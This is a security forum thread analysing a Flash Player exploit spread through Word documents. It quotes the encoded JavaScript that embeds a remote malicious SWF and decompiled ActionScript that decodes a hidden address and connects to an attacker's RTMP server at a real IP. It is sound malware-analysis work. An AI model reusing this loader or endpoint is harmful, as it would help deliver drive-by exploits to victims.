CVE-2012-0779 - Flash Player Exploit

**c0d3inj3cT** · 05-11-2012, 09:08 PM

This is regarding a latest Flash Player Exploit which is being used in the wild, mostly being served to victims in the form of Word Documents.

A brief overview before we get to the good stuff:

A Word Document has the following malicious JavaScript embedded in it:

Code:

javascript:eval(document.write(unescape('%3Cembed%20src%3Dhttp://example.com/malicious.swf?info=<48 Char Hash>&infosize=<A Dword>%3E%3C/embed%3E')))

This JavaScript can easily be located by viewing the strings of the Word Document. It is encoded but it should be easy to follow that it creates an embed tag as following:

Code:

<embed src="http://example.com/malicious.swf?info=<48 Char Hash>&infosize=<A Dword>"></embed>

Apart from the above malicious JavaScript, you will also find a payload present inside the Word Document. The MZ and PE Signatures are XOR Encrypted using a Byte. It can be easily retrieved using OfficeMalScanner.

It will bruteforce the XOR Key and dump the embedded payload. You may find only 1 binary or even multiple binaries.

When you open the MS Word Document, it will connect to the URL mentioned in the SRC Attribute of the Embed tag and fetch a SWF File. This in turn will spray the Process Heap with shellcode and trigger the vulnerability in Flash Player, thereby redirecting the execution to shellcode sprayed over the heap.

This shellcode will locate the payload present inside the Word Document.

Now, let's focus on the SWF file. You can fetch a SWF File from Contagio here:

http://contagiodump.blogspot.in/2012...ld-uyghur.html

Thanks Mila

The SWF file is compressed as you can see from the magic bytes (CWS).

It is also encrypted using DoSWF version 5.0.3. This information can be found in the RDF Metadata of the decompressed SWF File.

The decompiled ActionScript is posted on Contagio. It's time to deep dive into the ActionScript.

**41.w4r10r** · 05-11-2012, 09:24 PM

Waiting to see length of your Deep Dive.....

good analysis....

keep it up...

**c0d3inj3cT** · 05-11-2012, 09:35 PM

This is again a brief analysis. There are a lot of functions defined in the ActionScript, so to make it easier for analysis, I will present the flow.

Start tracing from within function, v25()

Code:

        public function v25():void{
            var _local1:String;
            this.v11 = this.v40();
            this.v12 = this.v41();
            if ((((this.v12 == "windows 7")) || ((this.v12 == "windows xp")))){
                if (this.v11 == "win 10,1,52,14"){
                    return;
                };
                _local1 = this.v67();
                this.v51(_local1);
                this.v14 = this.v70();
                this.v42(this.v14);
            } else {
                return;
            };
        }

1. A function call to v40() is made.

Code:

this.v11 = this.v40();

Code:

        public function v40():String{
            var _local1:String = new String();
            _local1 = Capabilities.version.toLowerCase();
            return (_local1);
        }

It will return the version of Flash Player using the Capabilities.version method. This will return the result as "win 10,3,183,10". It means that the Flash Player version is 10.3.183.10

2. A function call to v41() is made.

Code:

this.v12 = this.v41();

It will return the version of Operating System on which the Flash Player is running using the Capabilities.os method

Code:

        public function v41():String{
            var _local1:String = new String();
            _local1 = Capabilities.os.toLowerCase();
            return (_local1);
        }

3. It checks whether the OS is windows 7 or windows xp and proceeds, else returns. It also checks whether the version is = 10.1.52.14 in which case it again returns.

Code:

            if ((((this.v12 == "windows 7")) || ((this.v12 == "windows xp")))){
                if (this.v11 == "win 10,1,52,14"){
                    return;
                };

4. Uses v67() function to retrieve the infosize parameter value which was passed in the URL.

Code:

_local1 = this.v67();

Code:

        public function v67():String{
            var _local1:Object = root.loaderInfo["@doswf__p"];
            var _local2:String = _local1["infosize"];
            return (_local2);
        }

The value of the infosize parameter is the same as what was passed in the URL set in embed tag's src attribute.

5. Uses v70() function to retrieve the info hash which was passed in the URL and also decodes it.

Code:

this.v14 = this.v70();

I have taken the appropriate code snippets from the original ActionScript to decode the hash. AS3 Eval Library was used to interpret the code.

Notice the hash value set in _local2 variable.

Code:

namespace fu = "flash.utils"; 
use namespace fu;

public class LookAClass {
	public function LookAClass() {
		Util.print(v70());
	}
	        public function v50(_arg1:String):ByteArray{
            var _local2:String;
            var _local3:ByteArray = new ByteArray();
            var _local4:uint = _arg1.length;
            var _local5:uint;
            _local3.endian = Endian.LITTLE_ENDIAN;
            while (_local5 < _local4) {
                _local2 = (_arg1.charAt(_local5) + _arg1.charAt((_local5 + 1)));
                _local3.writeByte(parseInt(_local2, 16));
                _local5 = (_local5 + 2);
            };
            return (_local3);
        }

        public function v70():String{
            var _local2:String = "789c333230d13331d53337d633b3b432313106001afa0338";
            var _local3:ByteArray = this.v50(_local2);
            var _local4:uint;
            _local4 = 0;
            while (_local4 < _local3.length) {
                _local3[_local4] = (_local3[_local4] ^ 0);
                _local4++;
            };
            _local3.uncompress();
            var _local5:String = String(_local3);
            return (_local5);
        }
}
new LookAClass;

The result:

Name: fbu8H.png
Views: 703
Size: 15.6 KB

The decoded value gives the IP Address and Port Number. It is the IP Address of the same URL which was referenced in the src attribute of embed tag. The SWF file is hosted on the server with the same IP Address.

6. It passes the above decoded value to function, v42()

Code:

                this.v14 = this.v70();
                this.v42(this.v14);

7. It creates a NetConnection object and connects to the Flash Media Server with the following URL:

Code:

rtmp://204.45.73.69:443/TSGeneralSetting

Code:

        public function v42(_arg1:String):void{
            this.v15 = new NetConnection();
            var _local2 = "rtmp://";
            var _local3 = "/TSGeneralSetting";
            var _local4:String = ((_local2 + _arg1) + _local3);
            this.v15.connect(_local4);
            this.v15.call("systemMemoryCall", this.v16, "argc");
        }

It calls the systemMemoryCall method defined in the server side script and passes it an argument called argc

v16 is the Responder Object which is used to handle the return value from the server method, systemMemoryCall

Thread: CVE-2012-0779 - Flash Player Exploit

LinkBack

Thread Tools

Search Thread

Display